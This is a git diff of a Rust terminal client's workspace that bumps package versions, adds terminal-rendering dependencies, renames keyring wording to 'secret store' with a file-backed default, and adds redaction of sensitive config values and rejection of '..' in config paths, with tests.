@@ -4826,7 +4937,7 @@ dependencies = [
  "getrandom 0.3.4",
  "once_cell",
  "rustix 1.1.3",
- "windows-sys 0.61.2",
+ "windows-sys 0.52.0",
 ]
 
 [[package]]
@@ -4841,12 +4952,75 @@ dependencies = [
 ]
 
 [[package]]
+name = "terminfo"
+version = "0.9.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d4ea810f0692f9f51b382fff5893887bb4580f5fa246fde546e0b13e7fcee662"
+dependencies = [
+ "fnv",
+ "nom",
+ "phf",
+ "phf_codegen",
+]
+
+[[package]]
 name = "termios"
 version = "0.2.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "d5d9cf598a6d7ce700a4e6a9199da127e6819a61e64b68609683cc9a01b5683a"
 dependencies = [
  "libc",
+]
+
+[[package]]
+name = "termios"
+version = "0.3.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "411c5bf740737c7918b8b1fe232dca4dc9f8e754b8ad5e20966814001ed0ac6b"
+dependencies = [
+ "libc",
+]
+
+[[package]]
+name = "termwiz"
+version = "0.23.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4676b37242ccbd1aabf56edb093a4827dc49086c0ffd764a5705899e0f35f8f7"
+dependencies = [
+ "anyhow",
+ "base64",
+ "bitflags 2.10.0",
+ "fancy-regex 0.11.0",
+ "filedescriptor",
+ "finl_unicode",
+ "fixedbitset",
+ "hex",
+ "lazy_static",
+ "libc",
+ "log",
+ "memmem",
+ "nix 0.29.0",
+ "num-derive",
+ "num-traits",
+ "ordered-float",
+ "pest",
+ "pest_derive",
+ "phf",
+ "sha2 0.10.9",
+ "signal-hook",
+ "siphasher",
+ "terminfo",
+ "termios 0.3.3",
+ "thiserror 1.0.69",
+ "ucd-trie",
+ "unicode-segmentation",
+ "vtparse",
+ "wezterm-bidi",
+ "wezterm-blob-leases",
+ "wezterm-color-types",
+ "wezterm-dynamic",
+ "wezterm-input-types",
+ "winapi",
 ]
 
 [[package]]
@@ -5222,6 +5396,12 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "40ce102ab67701b8526c123c1bab5cbe42d7040ccfd0f64af1a385808d2f43de"
 
 [[package]]
+name = "ucd-trie"
+version = "0.1.7"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "2896d95c02a80c6d6a5d6e953d479f5ddf2dfdb6a244441010e373ac0fb88971"
+
+[[package]]
 name = "uds_windows"
 version = "1.2.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -5229,7 +5409,7 @@ checksum = "f2f6fb2847f6742cd76af783a2a2c49e9375d0a111c7bef6f71cd9e738c72d6e"
 dependencies = [
  "memoffset 0.9.1",
  "tempfile",
- "windows-sys 0.61.2",
+ "windows-sys 0.60.2",
 ]
 
 [[package]]
@@ -5264,17 +5444,6 @@ name = "unicode-segmentation"
 version = "1.12.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "f6ccf251212114b54433ec949fd6a7841275f9ada20dddd2f29e9ceea4501493"
-
-[[package]]
-name = "unicode-truncate"
-version = "1.1.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "b3644627a5af5fa321c95b9b235a72fd24cd29c648c2c379431e6628655627bf"
-dependencies = [
- "itertools 0.13.0",
- "unicode-segmentation",
- "unicode-width 0.1.14",
-]
 
 [[package]]
 name = "unicode-truncate"
@@ -5342,6 +5511,7 @@ version = "1.19.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "e2e054861b4bd027cd373e18e8d8d8e6548085000e41290d95ce0c373a654b4a"
 dependencies = [
+ "atomic",
  "getrandom 0.3.4",
  "js-sys",
  "wasm-bindgen",
@@ -5406,6 +5576,15 @@ checksum = "2e369bee1b05d510a7b4ed645f5faa90619e05437111783ea5848f28d97d3c2e"
 dependencies = [
  "proc-macro2",
  "quote",
+]
+
+[[package]]
+name = "vtparse"
+version = "0.6.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6d9b2acfb050df409c972a37d3b8e08cdea3bddb0c09db9d53137e504cfabed0"
+dependencies = [
+ "utf8parse",
 ]
 
 [[package]]
@@ -5558,6 +5737,78 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "a28ac98ddc8b9274cb41bb4d9d4d5c425b6020c50c46f25559911905610b4a88"
 
 [[package]]
+name = "wezterm-bidi"
+version = "0.2.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0c0a6e355560527dd2d1cf7890652f4f09bb3433b6aadade4c9b5ed76de5f3ec"
+dependencies = [
+ "log",
+ "wezterm-dynamic",
+]
+
+[[package]]
+name = "wezterm-blob-leases"
+version = "0.1.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "692daff6d93d94e29e4114544ef6d5c942a7ed998b37abdc19b17136ea428eb7"
+dependencies = [
+ "getrandom 0.3.4",
+ "mac_address",
+ "sha2 0.10.9",
+ "thiserror 1.0.69",
+ "uuid",
+]
+
+[[package]]
+name = "wezterm-color-types"
+version = "0.3.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7de81ef35c9010270d63772bebef2f2d6d1f2d20a983d27505ac850b8c4b4296"
+dependencies = [
+ "csscolorparser",
+ "deltae",
+ "lazy_static",
+ "wezterm-dynamic",
+]
+
+[[package]]
+name = "wezterm-dynamic"
+version = "0.2.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5f2ab60e120fd6eaa68d9567f3226e876684639d22a4219b313ff69ec0ccd5ac"
+dependencies = [
+ "log",
+ "ordered-float",
+ "strsim 0.11.1",
+ "thiserror 1.0.69",
+ "wezterm-dynamic-derive",
+]
+
+[[package]]
+name = "wezterm-dynamic-derive"
+version = "0.1.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "46c0cf2d539c645b448eaffec9ec494b8b19bd5077d9e58cb1ae7efece8d575b"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 1.0.109",
+]
+
+[[package]]
+name = "wezterm-input-types"
+version = "0.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7012add459f951456ec9d6c7e6fc340b1ce15d6fc9629f8c42853412c029e57e"
+dependencies = [
+ "bitflags 1.3.2",
+ "euclid 0.22.14",
+ "lazy_static",
+ "serde",
+ "wezterm-dynamic",
+]
+
+[[package]]
 name = "winapi"
 version = "0.3.9"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -5579,7 +5830,7 @@ version = "0.1.11"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "c2a7b1c03c876122aa43f3020e6c3c3ee5c05081c9a00739faf7503aeba10d22"
 dependencies = [
- "windows-sys 0.61.2",
+ "windows-sys 0.52.0",
 ]
 
 [[package]]

--- a/Cargo.lock
+++ b/Cargo.lock
@@ -1151,7 +1151,7 @@ dependencies = [
 
 [[package]]
 name = "deepseek-agent"
-version = "0.8.22"
+version = "0.8.23"
 dependencies = [
  "deepseek-config",
  "serde",
@@ -1159,7 +1159,7 @@ dependencies = [
 
 [[package]]
 name = "deepseek-app-server"
-version = "0.8.22"
+version = "0.8.23"
 dependencies = [
  "anyhow",
  "axum",
@@ -1181,7 +1181,7 @@ dependencies = [
 
 [[package]]
 name = "deepseek-config"
-version = "0.8.22"
+version = "0.8.23"
 dependencies = [
  "anyhow",
  "deepseek-secrets",
@@ -1193,7 +1193,7 @@ dependencies = [
 
 [[package]]
 name = "deepseek-core"
-version = "0.8.22"
+version = "0.8.23"
 dependencies = [
  "anyhow",
  "chrono",
@@ -1211,7 +1211,7 @@ dependencies = [
 
 [[package]]
 name = "deepseek-execpolicy"
-version = "0.8.22"
+version = "0.8.23"
 dependencies = [
  "anyhow",
  "deepseek-protocol",
@@ -1220,7 +1220,7 @@ dependencies = [
 
 [[package]]
 name = "deepseek-hooks"
-version = "0.8.22"
+version = "0.8.23"
 dependencies = [
  "anyhow",
  "async-trait",
@@ -1234,7 +1234,7 @@ dependencies = [
 
 [[package]]
 name = "deepseek-mcp"
-version = "0.8.22"
+version = "0.8.23"
 dependencies = [
  "anyhow",
  "serde",
@@ -1243,7 +1243,7 @@ dependencies = [
 
 [[package]]
 name = "deepseek-protocol"
-version = "0.8.22"
+version = "0.8.23"
 dependencies = [
  "serde",
  "serde_json",
@@ -1251,7 +1251,7 @@ dependencies = [
 
 [[package]]
 name = "deepseek-secrets"
-version = "0.8.22"
+version = "0.8.23"
 dependencies = [
  "dirs",
  "keyring",
@@ -1264,7 +1264,7 @@ dependencies = [
 
 [[package]]
 name = "deepseek-state"
-version = "0.8.22"
+version = "0.8.23"
 dependencies = [
  "anyhow",
  "chrono",
@@ -1276,7 +1276,7 @@ dependencies = [
 
 [[package]]
 name = "deepseek-tools"
-version = "0.8.22"
+version = "0.8.23"
 dependencies = [
  "anyhow",
  "async-trait",
@@ -1289,7 +1289,7 @@ dependencies = [
 
 [[package]]
 name = "deepseek-tui"
-version = "0.8.22"
+version = "0.8.23"
 dependencies = [
  "anyhow",
  "arboard",
@@ -1350,7 +1350,7 @@ dependencies = [
 
 [[package]]
 name = "deepseek-tui-cli"
-version = "0.8.22"
+version = "0.8.23"
 dependencies = [
  "anyhow",
  "chrono",
@@ -1374,7 +1374,7 @@ dependencies = [
 
 [[package]]
 name = "deepseek-tui-core"
-version = "0.8.22"
+version = "0.8.23"
 
 [[package]]
 name = "deltae"

--- a/Cargo.toml
+++ b/Cargo.toml
@@ -19,7 +19,7 @@ default-members = ["crates/cli", "crates/app-server", "crates/tui"]
 resolver = "2"
 
 [workspace.package]
-version = "0.8.22"
+version = "0.8.23"
 edition = "2024"
 # Rust 1.88 stabilized `let_chains` in `if`/`while` conditions, which the
 # codebase relies on extensively. Cargo enforces this so users on older

--- a/crates/agent/Cargo.toml
+++ b/crates/agent/Cargo.toml
@@ -7,5 +7,5 @@ repository.workspace = true
 description = "Model/provider registry and fallback strategy for DeepSeek workspace architecture"
 
 [dependencies]
-deepseek-config = { path = "../config", version = "0.8.22" }
+deepseek-config = { path = "../config", version = "0.8.23" }
 serde.workspace = true

--- a/crates/app-server/Cargo.toml
+++ b/crates/app-server/Cargo.toml
@@ -10,15 +10,15 @@ description = "Codex-style app-server transport for DeepSeek workspace architect
 anyhow.workspace = true
 axum.workspace = true
 clap.workspace = true
-deepseek-agent = { path = "../agent", version = "0.8.22" }
-deepseek-config = { path = "../config", version = "0.8.22" }
-deepseek-core = { path = "../core", version = "0.8.22" }
-deepseek-execpolicy = { path = "../execpolicy", version = "0.8.22" }
-deepseek-hooks = { path = "../hooks", version = "0.8.22" }
-deepseek-mcp = { path = "../mcp", version = "0.8.22" }
-deepseek-protocol = { path = "../protocol", version = "0.8.22" }
-deepseek-state = { path = "../state", version = "0.8.22" }
-deepseek-tools = { path = "../tools", version = "0.8.22" }
+deepseek-agent = { path = "../agent", version = "0.8.23" }
+deepseek-config = { path = "../config", version = "0.8.23" }
+deepseek-core = { path = "../core", version = "0.8.23" }
+deepseek-execpolicy = { path = "../execpolicy", version = "0.8.23" }
+deepseek-hooks = { path = "../hooks", version = "0.8.23" }
+deepseek-mcp = { path = "../mcp", version = "0.8.23" }
+deepseek-protocol = { path = "../protocol", version = "0.8.23" }
+deepseek-state = { path = "../state", version = "0.8.23" }
+deepseek-tools = { path = "../tools", version = "0.8.23" }
 serde.workspace = true
 serde_json.workspace = true
 tokio.workspace = true

--- a/crates/cli/Cargo.toml
+++ b/crates/cli/Cargo.toml
@@ -14,13 +14,13 @@ path = "src/main.rs"
 anyhow.workspace = true
 clap.workspace = true
 clap_complete.workspace = true
-deepseek-agent = { path = "../agent", version = "0.8.22" }
-deepseek-app-server = { path = "../app-server", version = "0.8.22" }
-deepseek-config = { path = "../config", version = "0.8.22" }
-deepseek-execpolicy = { path = "../execpolicy", version = "0.8.22" }
-deepseek-mcp = { path = "../mcp", version = "0.8.22" }
-deepseek-secrets = { path = "../secrets", version = "0.8.22" }
-deepseek-state = { path = "../state", version = "0.8.22" }
+deepseek-agent = { path = "../agent", version = "0.8.23" }
+deepseek-app-server = { path = "../app-server", version = "0.8.23" }
+deepseek-config = { path = "../config", version = "0.8.23" }
+deepseek-execpolicy = { path = "../execpolicy", version = "0.8.23" }
+deepseek-mcp = { path = "../mcp", version = "0.8.23" }
+deepseek-secrets = { path = "../secrets", version = "0.8.23" }
+deepseek-state = { path = "../state", version = "0.8.23" }
 chrono.workspace = true
 dirs.workspace = true
 serde.workspace = true

--- a/crates/cli/src/lib.rs
+++ b/crates/cli/src/lib.rs
@@ -256,7 +256,7 @@ enum AuthCommand {
         #[arg(long, value_enum)]
         provider: ProviderArg,
     },
-    /// Delete a provider's key from config and keyring storage.
+    /// Delete a provider's key from config and secret-store storage.
     Clear {
         #[arg(long, value_enum)]
         provider: ProviderArg,
@@ -556,14 +556,14 @@ fn resolve_runtime_for_dispatch_with_secrets(
         match store.save() {
             Ok(()) => {
                 eprintln!(
-                    "info: recovered API key from OS keyring and saved it to {}",
+                    "info: recovered API key from secret store and saved it to {}",
                     store.path().display()
                 );
                 resolved.api_key_source = Some(RuntimeApiKeySource::ConfigFile);
             }
             Err(err) => {
                 eprintln!(
-                    "warning: recovered API key from OS keyring but failed to save {}: {err}",
+                    "warning: recovered API key from secret store but failed to save {}: {err}",
                     store.path().display()
                 );
             }
@@ -806,7 +806,7 @@ fn auth_status_lines(store: &ConfigStore, secrets: &Secrets) -> Vec<String> {
     let active_source = if config_key.is_some() {
         "config"
     } else if keyring_key.is_some() {
-        "keyring"
+        "secret store"
     } else if env_key.is_some() {
         "env"
     } else {
@@ -832,14 +832,14 @@ fn auth_status_lines(store: &ConfigStore, secrets: &Secrets) -> Vec<String> {
     vec![
         format!("provider: {}", provider.as_str()),
         format!("active source: {active_label}"),
-        "lookup order: config -> keyring -> env".to_string(),
+        "lookup order: config -> secret store -> env".to_string(),
         format!(
             "config file: {} ({})",
             store.path().display(),
             source_status(config_key, "missing")
         ),
         format!(
-            "keyring: {} ({})",
+            "secret store: {} ({})",
             secrets.backend_name(),
             source_status(keyring_key.as_deref(), "missing")
         ),
@@ -929,7 +929,7 @@ fn run_auth_command_with_secrets(
             let source = if in_file {
                 Some("config-file")
             } else if in_keyring {
-                Some("keyring")
+                Some("secret-store")
             } else if in_env {
                 Some("env")
             } else {
@@ -947,11 +947,11 @@ fn run_auth_command_with_secrets(
             clear_provider_api_key_from_config(store, provider);
             clear_provider_api_key_from_keyring(secrets, provider);
             store.save()?;
-            println!("cleared API key for {slot} from config and keyring");
+            println!("cleared API key for {slot} from config and secret store");
             Ok(())
         }
         AuthCommand::List => {
-            println!("provider     config keyring env  active");
+            println!("provider     config store env  active");
             let active_provider = store.config.provider;
             for provider in PROVIDER_LIST {
                 let slot = provider_slot(provider);
@@ -962,7 +962,7 @@ fn run_auth_command_with_secrets(
                 let active = if file {
                     "config"
                 } else if keyring == Some(true) {
-                    "keyring"
+                    "store"
                 } else if env {
                     "env"
                 } else {
@@ -1012,8 +1012,8 @@ fn prompt_api_key(slot: &str) -> Result<String> {
     Ok(key)
 }
 
-/// Move plaintext keys from config.toml into an explicit platform credential
-/// store. Hidden in v0.8.8 because the normal setup path is config/env only.
+/// Move plaintext keys from config.toml into the configured secret store.
+/// Hidden in v0.8.8 because the normal setup path is config/env only.
 fn run_auth_migrate(store: &mut ConfigStore, secrets: &Secrets, dry_run: bool) -> Result<()> {
     let mut migrated: Vec<(ProviderKind, &'static str)> = Vec::new();
     let mut warnings: Vec<String> = Vec::new();
@@ -1042,7 +1042,9 @@ fn run_auth_migrate(store: &mut ConfigStore, secrets: &Secrets, dry_run: bool) -
             migrated.push((provider, slot));
             continue;
         } else if let Err(err) = secrets.set(slot, &value) {
-            warnings.push(format!("skipped {slot}: failed to write to keyring: {err}"));
+            warnings.push(format!(
+                "skipped {slot}: failed to write to secret store: {err}"
+            ));
             continue;
         }
         if !dry_run {
@@ -1060,7 +1062,7 @@ fn run_auth_migrate(store: &mut ConfigStore, secrets: &Secrets, dry_run: bool) -
             .context("failed to write updated config.toml")?;
     }
 
-    println!("keyring backend: {}", secrets.backend_name());
+    println!("secret store backend: {}", secrets.backend_name());
     if migrated.is_empty() {
         println!("nothing to migrate (config.toml has no plaintext api_key entries)");
     } else {
@@ -2273,10 +2275,10 @@ mod tests {
 
         assert!(output.contains("provider: deepseek"));
         assert!(output.contains("active source: config (last4: ...3333)"));
-        assert!(output.contains("lookup order: config -> keyring -> env"));
+        assert!(output.contains("lookup order: config -> secret store -> env"));
         assert!(output.contains("config file: "));
         assert!(output.contains("set, last4: ...3333"));
-        assert!(output.contains("keyring: in-memory (test) (set, last4: ...2222)"));
+        assert!(output.contains("secret store: in-memory (test) (set, last4: ...2222)"));
         assert!(output.contains("env var: DEEPSEEK_API_KEY (set, last4: ...1111)"));
         assert!(!output.contains("sk-config-3333"));
         assert!(!output.contains("sk-keyring-2222"));

--- a/crates/cli/src/lib.rs
+++ b/crates/cli/src/lib.rs
@@ -1088,7 +1088,7 @@ fn run_auth_migrate(store: &mut ConfigStore, secrets: &Secrets, dry_run: bool) -
 fn run_config_command(store: &mut ConfigStore, command: ConfigCommand) -> Result<()> {
     match command {
         ConfigCommand::Get { key } => {
-            if let Some(value) = store.config.get_value(&key) {
+            if let Some(value) = store.config.get_display_value(&key) {
                 println!("{value}");
                 return Ok(());
             }

--- a/crates/config/Cargo.toml
+++ b/crates/config/Cargo.toml
@@ -8,7 +8,7 @@ description = "Config schema and precedence model for DeepSeek workspace archite
 
 [dependencies]
 anyhow.workspace = true
-deepseek-secrets = { path = "../secrets", version = "0.8.22" }
+deepseek-secrets = { path = "../secrets", version = "0.8.23" }
 dirs.workspace = true
 serde.workspace = true
 toml.workspace = true

--- a/crates/config/src/lib.rs
+++ b/crates/config/src/lib.rs
@@ -835,7 +835,8 @@ impl ConfigToml {
     ///
     /// This method keeps library callers prompt-free: CLI flag → config file
     /// → environment. Call `resolve_runtime_options_with_secrets` when a
-    /// user-facing dispatcher should recover OS-keyring credentials.
+    /// user-facing dispatcher should recover credentials from the configured
+    /// secret store.
     #[must_use]
     pub fn resolve_runtime_options(&self, cli: &CliRuntimeOverrides) -> ResolvedRuntimeOptions {
         let no_keyring = Secrets::new(std::sync::Arc::new(
@@ -846,7 +847,7 @@ impl ConfigToml {
 
     /// Resolve runtime options using an explicit secrets façade.
     ///
-    /// API-key precedence is **CLI flag → config-file → keyring → environment**.
+    /// API-key precedence is **CLI flag → config-file → secret store → environment**.
     #[must_use]
     pub fn resolve_runtime_options_with_secrets(
         &self,
@@ -869,8 +870,8 @@ impl ConfigToml {
         // CLI flag wins outright. Otherwise: config-file → injected secrets/env.
         // This makes `deepseek auth set` a reliable fix even when the user's
         // shell still exports an old key. When the file is empty, the injected
-        // secrets façade recovers older OS-keyring credentials before falling
-        // back to ambient env.
+        // secrets façade recovers configured secret-store credentials before
+        // falling back to ambient env.
         let from_file = provider_cfg.api_key.clone().or(root_deepseek_api_key);
         let (api_key, api_key_source) = if let Some(value) = cli.api_key.clone() {
             (Some(value), Some(RuntimeApiKeySource::Cli))

--- a/crates/config/src/lib.rs
+++ b/crates/config/src/lib.rs
@@ -2,7 +2,7 @@ use std::collections::BTreeMap;
 use std::fs;
 #[cfg(unix)]
 use std::io::Write;
-use std::path::{Path, PathBuf};
+use std::path::{Component, Path, PathBuf};
 use std::sync::OnceLock;
 
 use anyhow::{Context, Result, bail};
@@ -449,6 +449,17 @@ impl ConfigToml {
             }
             _ => self.extras.get(key).map(toml::Value::to_string),
         }
+    }
+
+    #[must_use]
+    pub fn get_display_value(&self, key: &str) -> Option<String> {
+        self.get_value(key).map(|value| {
+            if is_sensitive_config_key(key) {
+                redact_secret(&value)
+            } else {
+                value
+            }
+        })
     }
 
     pub fn set_value(&mut self, key: &str, value: &str) -> Result<()> {
@@ -1229,16 +1240,19 @@ pub fn default_secrets() -> &'static Secrets {
 }
 
 pub fn resolve_config_path(explicit: Option<PathBuf>) -> Result<PathBuf> {
-    if let Some(path) = explicit {
-        return Ok(path);
-    }
-    if let Ok(path) = std::env::var("DEEPSEEK_CONFIG_PATH") {
+    let path = if let Some(path) = explicit {
+        path
+    } else if let Ok(path) = std::env::var("DEEPSEEK_CONFIG_PATH") {
         let trimmed = path.trim();
         if !trimmed.is_empty() {
-            return Ok(PathBuf::from(trimmed));
+            PathBuf::from(trimmed)
+        } else {
+            return default_config_path();
         }
-    }
-    default_config_path()
+    } else {
+        return default_config_path();
+    };
+    normalize_config_file_path(path)
 }
 
 pub fn default_config_path() -> Result<PathBuf> {
@@ -1305,6 +1319,35 @@ fn redact_secret(secret: &str) -> String {
         .rev()
         .collect();
     format!("{prefix}***{suffix}")
+}
+
+#[must_use]
+pub fn is_sensitive_config_key(key: &str) -> bool {
+    matches!(
+        key,
+        "api_key" | "auth.chatgpt_access_token" | "auth.device_code_session"
+    ) || key.ends_with(".api_key")
+}
+
+fn normalize_config_file_path(path: PathBuf) -> Result<PathBuf> {
+    if path.as_os_str().is_empty() {
+        bail!("config path cannot be empty");
+    }
+    if path
+        .components()
+        .any(|component| matches!(component, Component::ParentDir))
+    {
+        bail!("config path cannot contain '..' components");
+    }
+    if path.file_name().is_none() {
+        bail!("config path must include a file name");
+    }
+    if path.is_absolute() {
+        return Ok(path);
+    }
+    Ok(std::env::current_dir()
+        .context("failed to resolve current directory for config path")?
+        .join(path))
 }
 
 #[derive(Debug, Clone, Default)]
@@ -1799,6 +1842,38 @@ mod tests {
     }
 
     #[test]
+    fn get_display_value_redacts_sensitive_keys() {
+        let mut config = ConfigToml {
+            api_key: Some("sk-deepseek-secret".to_string()),
+            chatgpt_access_token: Some("chatgpt-access-secret".to_string()),
+            ..ConfigToml::default()
+        };
+        config.providers.openrouter.api_key = Some("openrouter-secret-value".to_string());
+        config.model = Some("deepseek-v4-pro".to_string());
+
+        assert_eq!(
+            config.get_display_value("api_key").as_deref(),
+            Some("sk-d***cret")
+        );
+        assert_eq!(
+            config
+                .get_display_value("auth.chatgpt_access_token")
+                .as_deref(),
+            Some("chat***cret")
+        );
+        assert_eq!(
+            config
+                .get_display_value("providers.openrouter.api_key")
+                .as_deref(),
+            Some("open***alue")
+        );
+        assert_eq!(
+            config.get_display_value("model").as_deref(),
+            Some("deepseek-v4-pro")
+        );
+    }
+
+    #[test]
     fn list_values_redacts_unicode_api_key_without_byte_slicing() {
         let config = ConfigToml {
             api_key: Some("密钥密钥密钥密钥123456789".to_string()),
@@ -1811,6 +1886,13 @@ mod tests {
             values.get("api_key").map(String::as_str),
             Some("密钥密钥***6789")
         );
+    }
+
+    #[test]
+    fn normalize_config_file_path_rejects_traversal() {
+        let err = normalize_config_file_path(PathBuf::from("../config.toml"))
+            .expect_err("traversal path should fail");
+        assert!(format!("{err:#}").contains("cannot contain '..'"));
     }
 
     #[cfg(unix)]

--- a/crates/core/Cargo.toml
+++ b/crates/core/Cargo.toml
@@ -9,13 +9,13 @@ description = "Core runtime boundaries for DeepSeek workspace architecture"
 [dependencies]
 anyhow.workspace = true
 chrono.workspace = true
-deepseek-agent = { path = "../agent", version = "0.8.22" }
-deepseek-config = { path = "../config", version = "0.8.22" }
-deepseek-execpolicy = { path = "../execpolicy", version = "0.8.22" }
-deepseek-hooks = { path = "../hooks", version = "0.8.22" }
-deepseek-mcp = { path = "../mcp", version = "0.8.22" }
-deepseek-protocol = { path = "../protocol", version = "0.8.22" }
-deepseek-state = { path = "../state", version = "0.8.22" }
-deepseek-tools = { path = "../tools", version = "0.8.22" }
+deepseek-agent = { path = "../agent", version = "0.8.23" }
+deepseek-config = { path = "../config", version = "0.8.23" }
+deepseek-execpolicy = { path = "../execpolicy", version = "0.8.23" }
+deepseek-hooks = { path = "../hooks", version = "0.8.23" }
+deepseek-mcp = { path = "../mcp", version = "0.8.23" }
+deepseek-protocol = { path = "../protocol", version = "0.8.23" }
+deepseek-state = { path = "../state", version = "0.8.23" }
+deepseek-tools = { path = "../tools", version = "0.8.23" }
 serde_json.workspace = true
 uuid.workspace = true

--- a/crates/execpolicy/Cargo.toml
+++ b/crates/execpolicy/Cargo.toml
@@ -8,5 +8,5 @@ description = "Execution policy and approval model parity for DeepSeek workspace
 
 [dependencies]
 anyhow.workspace = true
-deepseek-protocol = { path = "../protocol", version = "0.8.22" }
+deepseek-protocol = { path = "../protocol", version = "0.8.23" }
 serde.workspace = true

--- a/crates/hooks/Cargo.toml
+++ b/crates/hooks/Cargo.toml
@@ -10,7 +10,7 @@ description = "Hook dispatch and notifications parity for DeepSeek workspace arc
 anyhow.workspace = true
 async-trait.workspace = true
 chrono.workspace = true
-deepseek-protocol = { path = "../protocol", version = "0.8.22" }
+deepseek-protocol = { path = "../protocol", version = "0.8.23" }
 reqwest.workspace = true
 serde.workspace = true
 serde_json.workspace = true

--- a/crates/secrets/src/lib.rs
+++ b/crates/secrets/src/lib.rs
@@ -1,14 +1,13 @@
 //! Secret storage for DeepSeek API keys.
 //!
 //! Provides a small abstraction (`KeyringStore`) plus a default
-//! implementation backed by the OS keyring (`DefaultKeyringStore`),
-//! a file-based fallback for headless or unsupported platforms
-//! (`FileKeyringStore`), and an in-memory store for tests
+//! file-based implementation (`FileKeyringStore`), an opt-in OS keyring
+//! implementation (`DefaultKeyringStore`), and an in-memory store for tests
 //! (`InMemoryKeyringStore`).
 //!
-//! Higher-level lookup through [`Secrets::resolve`] checks the keyring first
+//! Higher-level lookup through [`Secrets::resolve`] checks the secret store first
 //! and falls back to environment variables. Config-file precedence lives in the
-//! config crate so user-facing commands can keep `config -> keyring -> env`
+//! config crate so user-facing commands can keep `config -> secret store -> env`
 //! explicit at the call site.
 #![deny(missing_docs)]
 
@@ -23,6 +22,9 @@ use thiserror::Error;
 /// Default OS keychain service name. macOS users can verify entries with
 /// `security find-generic-password -s deepseek -a <provider>`.
 pub const DEFAULT_SERVICE: &str = "deepseek";
+/// Select the secret storage backend. Supported values are `file` (default)
+/// and `system`/`keyring` for the OS credential store.
+pub const SECRET_BACKEND_ENV: &str = "DEEPSEEK_SECRET_BACKEND";
 
 /// Errors that may arise from a [`KeyringStore`] backend.
 #[derive(Debug, Error)]
@@ -61,9 +63,10 @@ pub trait KeyringStore: Send + Sync {
 }
 
 /// OS keyring backend (macOS Keychain, Windows Credential Manager,
-/// Linux Secret Service / kwallet). On platforms without a configured
-/// native keyring dependency, probing this backend returns an unsupported
-/// error so [`Secrets::auto_detect`] can fall back to [`FileKeyringStore`].
+/// Linux Secret Service / kwallet). This backend is opt-in through
+/// [`SECRET_BACKEND_ENV`]. On platforms without a configured native
+/// keyring dependency, probing this backend returns an unsupported error so
+/// [`Secrets::auto_detect`] can fall back to [`FileKeyringStore`].
 #[derive(Debug, Clone)]
 pub struct DefaultKeyringStore {
     /// Keyring service name (defaults to [`DEFAULT_SERVICE`]).
@@ -349,17 +352,35 @@ impl KeyringStore for FileKeyringStore {
     }
 }
 
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+enum SecretBackendSelection {
+    File,
+    System,
+    Unknown,
+}
+
+fn secret_backend_selection(value: Option<&str>) -> SecretBackendSelection {
+    match value.map(str::trim).filter(|value| !value.is_empty()) {
+        None => SecretBackendSelection::File,
+        Some(value) => match value.to_ascii_lowercase().as_str() {
+            "file" | "local" | "json" => SecretBackendSelection::File,
+            "system" | "keyring" | "os" | "os-keyring" => SecretBackendSelection::System,
+            _ => SecretBackendSelection::Unknown,
+        },
+    }
+}
+
 /// High-level façade combining a [`KeyringStore`] with environment
 /// variable fallbacks.
 ///
-/// Lookup precedence: **keyring → env → none**. Callers that also have
+/// Lookup precedence: **secret store → env → none**. Callers that also have
 /// a TOML config layer must wire that themselves at the very end of
 /// the chain.
 #[derive(Clone)]
 pub struct Secrets {
     /// Underlying secret store.
     pub store: Arc<dyn KeyringStore>,
-    /// Owner identifier within the keyring (typically "deepseek"); the
+    /// Owner identifier within the secret store (typically "deepseek"); the
     /// `key` parameter passed to `resolve` is mapped to a slot in the
     /// store as-is, while envs are looked up by canonical name.
     service: String,
@@ -368,7 +389,7 @@ pub struct Secrets {
 /// Source layer that provided a resolved secret.
 #[derive(Debug, Clone, Copy, PartialEq, Eq)]
 pub enum SecretSource {
-    /// The configured keyring backend returned the secret.
+    /// The configured secret-store backend returned the secret.
     Keyring,
     /// A process environment variable returned the secret.
     Env,
@@ -393,11 +414,50 @@ impl Secrets {
         }
     }
 
-    /// Construct the platform-appropriate default backend. On platforms
-    /// where an OS keyring backend is reachable this returns
-    /// [`DefaultKeyringStore`]; otherwise it falls back to
-    /// [`FileKeyringStore`] under `~/.deepseek/secrets/`.
+    /// Construct the default backend. The prompt-free default is
+    /// [`FileKeyringStore`] under `~/.deepseek/secrets/`. Set
+    /// [`SECRET_BACKEND_ENV`] to `system` or `keyring` to opt into the OS
+    /// credential store.
     pub fn auto_detect() -> Self {
+        match secret_backend_selection(std::env::var(SECRET_BACKEND_ENV).ok().as_deref()) {
+            SecretBackendSelection::File => Self::file_backed_default(),
+            SecretBackendSelection::Unknown => {
+                tracing::warn!(
+                    "{SECRET_BACKEND_ENV} has an unsupported value; using file-backed secret store"
+                );
+                Self::file_backed_default()
+            }
+            SecretBackendSelection::System => {
+                let default_store = DefaultKeyringStore::default();
+                match default_store.probe() {
+                    Ok(()) => Self::new(Arc::new(default_store)),
+                    Err(err) => {
+                        tracing::warn!(
+                            "OS keyring unavailable ({err}); falling back to file-backed secret store"
+                        );
+                        Self::file_backed_default()
+                    }
+                }
+            }
+        }
+    }
+
+    fn file_backed_default() -> Self {
+        let path = FileKeyringStore::default_path()
+            .unwrap_or_else(|_| PathBuf::from(".deepseek-secrets.json"));
